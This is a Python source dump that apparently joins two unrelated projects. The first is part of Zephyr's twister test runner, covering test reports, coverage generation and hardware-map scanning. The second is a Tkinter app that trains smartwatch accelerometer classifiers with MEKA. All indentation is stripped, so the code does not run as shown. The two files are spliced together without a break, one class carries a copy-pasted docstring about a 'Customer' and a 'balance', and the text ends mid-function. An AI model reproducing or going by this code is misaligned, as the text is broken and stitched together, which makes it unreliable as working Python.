eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
eleTestsuite = None
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
else:
logger.info(f"Did not find any existing results for {p}")
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
if not eleTestsuite or not eleTestsuite.findall(f'testcase/[@name="{k}"]'):
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
if not report_skipped and total == skips:
continue
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if eleTestsuite:
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % (skips + int(eleTestsuite.attrib['skipped']))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if instance.status == 'skipped' and not report_skipped:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size", "run_id"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
try:
rowdict["run_id"] = instance.run_id
except AttributeError:
# No run_id available
rowdict["run_id"] = "na"
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["SKIP"] or instance.status == 'skipped':
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
elif instance.results[k] in ["PASS"] or instance.status == 'passed':
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout", "flash_error"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify that each platform name (passed with the --platform option, or listed
in a yaml file under platform_allow or integration_platforms) is recognized.
If not, log an error and exit.
"""
for platform in platform_names_to_verify:
    if platform not in self.platform_names:
        logger.error(f"{log_info} - unrecognized platform - {platform}")
        sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all non-skipped instances in the suite and create a link
for each instance's build directory. Those links are passed to the CMake
command in the next steps.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create the build directory under its original "long" path, create a link
with a much shorter path pointing at it, and then replace build_dir with
that link. The link is what gets passed to the CMake command; this keeps
path lengths short, which matters when building with CMake on Windows.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
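# The console log frames coverage data between GCOV_COVERAGE_DUMP_START and GCOV_COVERAGE_DUMP_END;
# each payload line has the form '*<file name><hex dump>'.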
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# gcovr fails when coverage data is provided for kobject_hash,
# so skip it; the problem only occurs in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added so genhtml does not exit due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
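# e.g. _interleave_list("-e", ["foo", "bar"]) returns ["-e", "foo", "-e", "bar"]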
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
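# 'available' and 'counter' are backed by shared Value objects so they can be read and updated safely across worker processes.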
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
serial_baud=baud,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
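# Re-attach detected boards to existing map entries by id and product so previously configured settings are preserved.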
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
GUI.py
from Tkinter import *
import os.path
from chronoslib import *
import time
import threading
import ctypes
import os
import operator
addUser = None
recognizeUser = None
global_frame = None
common_box = None
v0 = Tk()
class User(object):
"""A user from the user recognition system. Users have the
following properties:
Attributes:
ID: A string representing the user's identification.
age: A integer with the user's age.
gender: A string with the user's gender.
fitness: An integer with the user fitness (values from 1 to 5).
"""
def __init__(self, ID):
"""Return a Customer object whose name is *name* and starting
balance is *balance*."""
self.ID = ID
self.age = 0
self.gender = 'none'
self.fitness = 1
def getID(self):
return self.ID
def getAge(self):
return self.age
def getGender(self):
return self.gender
def getFitness(self):
return self.fitness
def setID(self, ID):
self.ID = ID
def setAge(self, age):
self.age = age
def setGender(self, gender):
self.gender = gender
def setFitness(self, fitness):
self.fitness = fitness
def addUser(self, ID, age, gender, fitness):
self.ID = ID
self.age = age
self.gender = gender
self.fitness = fitness
class Activity(object):
"""Activities that are recognised by the system. Activities have the
following properties:
Attributes:
ID: An int identifying the activity.
name: A string with the activity name.
train_time: An int with the training time (in seconds) required for the activity.
"""
def __init__(self, ID, name, train_time):
self.ID = ID
self.name = name
self.train_time = train_time
def setID(self, ID):
self.ID = ID
def setName(self, name):
self.name = name
def setTrain_time(self, train_time):
self.train_time = train_time
def getID(self):
return self.ID
def getName(self):
return self.name
def getTrain_time(self):
return self.train_time
class Model(object):
"""Machine learning model to recognize users. Models have the
following properties:
Attributes:
algorithm: A string indicating the algorithm name.
parameters: An integer vector with the algorithm parameters.
users: A list of User objects that the model can recognize.
activities: A list of Activity objects that the model can recognize.
"""
def __init__(self, algorithm, parameters):
self.algorithm = algorithm
self.parameters = parameters
self.users = []
self.activities = []
def setAlgorithm(self, algorithm):
self.algorithm = algorithm
def setParameters(self, parameters):
self.parameters = parameters
def setUsers(self, users):
self.users = users
def setActivities(self, activities):
self.activities = activities
def addUser(self, user):
self.users.append(user)
def addActivity(self, activity):
self.activities.append(activity)
def getAlgorithm(self):
return self.algorithm
def getParameters(self):
return self.parameters
def getUsers(self):
return self.users
def getActivities(self):
return self.activities
class ACCData(object):
"""ACC information from the smartwatch. ACCData has the
following properties:
Attributes:
x: The accelerometer reading along the x axis.
y: The accelerometer reading along the y axis.
z: The accelerometer reading along the z axis.
"""
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def getX(self):
return self.x
def getY(self):
return self.y
def getZ(self):
return self.z
def terminate_thread(thread):
"""Terminates a python thread from another thread.
:param thread: a threading.Thread instance
"""
if thread is None or not thread.isAlive():
return
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(thread.ident), exc)
if res == 0:
raise ValueError("nonexistent thread id")
elif res > 1:
# If it returns a number greater than one, something went wrong,
# so call it again with exc=NULL to revert the effect.
ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(thread.ident), None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def keep_flat(event): # keep the main buttons flat when they are clicked
if event.widget is addUser or event.widget is recognizeUser: # the click came from one of the two buttons
event.widget.config(relief=FLAT) # re-apply the flat relief
def train(information, but):
global common_box
global model
global global_frame
global v0
user = User(len(model.getUsers()))
model.addUser(user)
# Check if there is a data file to create the classifier
with open('data.arff', 'r') as input_file, open('data.csv', 'a+') as output_file:
users = '{'
for x in range(0, len(model.getUsers())):
users += str(x) + ','
users = users[:-1]
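# The previous header listed one user fewer; drop the trailing ",<id>" (this assumes single-digit user IDs)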
old_users = users[:-2]
old_users += '}'
users += '}'
if os.stat(input_file.name).st_size == 0:
activities = '{'
for x in range(0, len(model.getActivities())):
activities += str(x) + ','
activities = activities[:-1]
activities += '}'
output_file.write(
'@relation \'Accelerometer: -C 2\'\n\n@attribute activity- ' + activities + '\n@attribute user- ' + users + '\n@attribute x numeric\n@attribute y numeric\n@attribute z numeric\n\n@data\n')
else:
for line in input_file:
if line == ('@attribute user- ' + old_users + '\n'):
output_file.write('@attribute user- ' + users + '\n')
else:
output_file.write(line)
# Start to record data for each activity
fd = port_open()
start_ap(fd)
ide = user.getID()
for x in model.getActivities():
# Get activity x data
info = "Training period for activity " + str(x.getID()) + " (" + x.getName() + ") started. \nPlease, perform this action for " + str(x.getTrain_time()) + " seconds."
information.config(text=info)
t_end = time.time() + x.getTrain_time()
while time.time() < t_end:
r = get_acc_data(fd)
if r:
output_file.write(str(x.getID()) + ',' + str(ide) + ',' + str(r[0]) + ',' + str(r[1]) + ',' + str(r[2]) + '\n')
stop_ap(fd)
info = "Training process completed. Please wait until the model is updated."
information.config(text=info)
# Train the system
if os.path.isfile('./data.arff'):
os.remove('./data.arff')
os.rename('./data.csv', './data.arff')
with open('./data.arff', 'a+') as f:
os.system(
'java -cp ".\meka-release-1.9.1\lib\*" meka.classifiers.multitarget.BCC -t ' + f.name +
' -X Ibf -S 0 -d BccJ48.model -R -W weka.classifiers.trees.J48 -- -C 0.1 -M 10')
# Inform the user that the model has been updated to include them
information.config(text='User added to the system.')
but.config(text='Return')
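# For reference, a sketch of the ARFF header that train() and main() generate,
# shown here for a hypothetical model with 2 users and 4 activities (the counts
# are illustrative assumptions). This constant is not used by the code above.
_EXAMPLE_ARFF_HEADER = (
    "@relation 'Accelerometer: -C 2'\n\n"
    "@attribute activity- {0,1,2,3}\n"
    "@attribute user- {0,1}\n"
    "@attribute x numeric\n"
    "@attribute y numeric\n"
    "@attribute z numeric\n\n"
    "@data\n"
)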
def test(information, but):
global common_box
global model
global global_frame
global v0
# Start data collection
with open('./user_data.arff', 'w') as f:
# Get the activities
activities = '{'
for x in range(0, len(model.getActivities())):
activities += str(x) + ','
activities = activities[:-1]
activities += '}'
# Get the users
users = '{'
for x in range(0, len(model.getUsers())):
users += str(x) + ','
users = users[:-1]
users += '}'
f.write('@relation \'Accelerometer: -C 2\'\n\n@attribute activity- ' + activities + '\n@attribute user- ' + users + '\n@attribute x numeric\n@attribute y numeric\n@attribute z numeric\n\n@data\n')
# Get user data
fd = port_open()
start_ap(fd)
t_end = time.time() + 30
while time.time() < t_end:
r = get_acc_data(fd)
if r:
f.write('?,?,' + str(r[0]) + ',' + str(r[1]) + ',' + str(r[2]) + '\n')
stop_ap(fd)
# Start user recognition
with open('./user_data.arff', 'a+') as f:
if os.stat(f.name).st_size != 0:
os.system(
'java -cp ".\meka-release-1.9.1\lib\*" meka.classifiers.multitarget.BCC -l BccJ48.model -t ' + f.name + ' -T ' + f.name + ' -predictions ./results.csv -no-eval')
# act_res and us_res map each predicted class to the number of times it appears
act_res = {}
us_res = {}
total = 0
# Calculate user results
with open('./results.csv', 'r') as f:
for line in f:
if 'activity' in line:
continue
else:
# activity-,user-,x,y,z: we use activity and user
res = line.split(',')
total += 1
act = res[0]
us = res[1]
if not act_res:
act_res[act] = 1
else:
if act in act_res:
act_res[act] = act_res.get(act) + 1
else:
act_res[act] = 1
if not us_res:
us_res[us] = 1
else:
if us in us_res:
us_res[us] = us_res.get(us) + 1
else:
us_res[us] = 1
# Calculate the accuracy of the result
# Activity:
act = max(act_res.iteritems(), key=operator.itemgetter(1))[0]
# User:
us = max(us_res.iteritems(), key=operator.itemgetter(1))[0]
act_stat = (act_res.get(act)*100) / total
us_stat = (us_res.get(us)*100) / total
act_name = ''
for x in model.getActivities():
if x.getID() == act:
act_name = x.getName()
# Inform the user of the results
info = 'Data belongs to user ' + str(us) + ' with a probability of ' + str(us_stat) + '%\n while ' + act_name + ' with a probability of ' + str(act_stat) + '%.'
information.config(text=info)
but.config(text='Return')
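# A standalone sketch of the majority vote that test() performs over the MEKA
# predictions (not used above; provided for clarity).
def _majority_vote(labels):
    counts = {}
    for label in labels:
        counts[label] = counts.get(label, 0) + 1
    winner = max(counts.items(), key=operator.itemgetter(1))[0]
    confidence = (counts[winner] * 100) / len(labels)
    return winner, confidence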
model = Model('J48', None)
train_thread = None
recognize_thread = None
def add():
global global_frame
global model
global common_box
global train_thread
v0.configure(background='white')
global_frame.destroy()
global_frame = Frame(v0)
global_frame.configure(background='white')
text_frame = Frame(global_frame)
text = Text(text_frame, bg="black", height=1.4, width=58, relief=FLAT)
text.insert(INSERT, "User recognition > ")
text.insert(END, "Add user")
text.pack()
text.tag_add("first", "1.0", "1.18")
text.tag_add("second", "1.18", "1.28")
text.tag_config("first", foreground="#8A8A8A")
text.tag_config("second", foreground="white")
text.configure(pady=8, padx=15)
text_frame.pack(side=TOP, expand=NO, fill=NONE)
common_box = Frame(global_frame)
common_box.configure(background='white')
# info = StringVar()
info = "Initiating training period. Please, wait..."
information = Label(common_box, text=info, pady=30, padx=30)
information.configure(background="white")
# info.set("Training period for activity 1 (resting) started. Please, wait...")
information.pack()
but_frame = Frame(common_box)
but = Button(but_frame, text="Cancel", bg='#8A8A8A', fg='white', command=mainScreen, relief=FLAT, padx=5, pady=4)
but.pack(side=LEFT, padx=10, pady=5)
but_frame.configure(background='white')
but_frame.pack(side=BOTTOM)
v0.bind('<Button-3>', keep_flat)
common_box.pack()
global_frame.pack()
# MEKA events
train_thread = threading.Thread(target=train, args=[information, but])
train_thread.start()
v0.mainloop()
def recognize():
global global_frame
global model
global recognize_thread
v0.configure(background='white')
global_frame.destroy()
global_frame = Frame(v0)
global_frame.configure(background='white')
text_frame = Frame(global_frame)
text = Text(text_frame, bg="black", height=1.4, width=58, relief=FLAT)
text.insert(INSERT, "User recognition > ")
text.insert(END, "Recognize user")
text.pack()
text.tag_add("first", "1.0", "1.18")
text.tag_add("second", "1.18", "1.36")
text.tag_config("first", foreground="#8A8A8A")
text.tag_config("second", foreground="white")
text.configure(pady=8, padx=15)
text_frame.pack(side=TOP, expand=NO, fill=NONE)
info = "Collecting user data. Please, stand by..."
information = Label(global_frame, text=info, pady=30, padx=30)
information.configure(background="white")
information.pack()
but_frame = Frame(global_frame)
but = Button(but_frame, text="Cancel", bg='#8A8A8A', fg='white', command=mainScreen, relief=FLAT, padx=5,
pady=4)
but.pack(side=LEFT, padx=10, pady=5)
but_frame.configure(background='white')
but_frame.pack(side=BOTTOM)
v0.bind('<Button-4>', keep_flat)
global_frame.pack()
# MEKA events
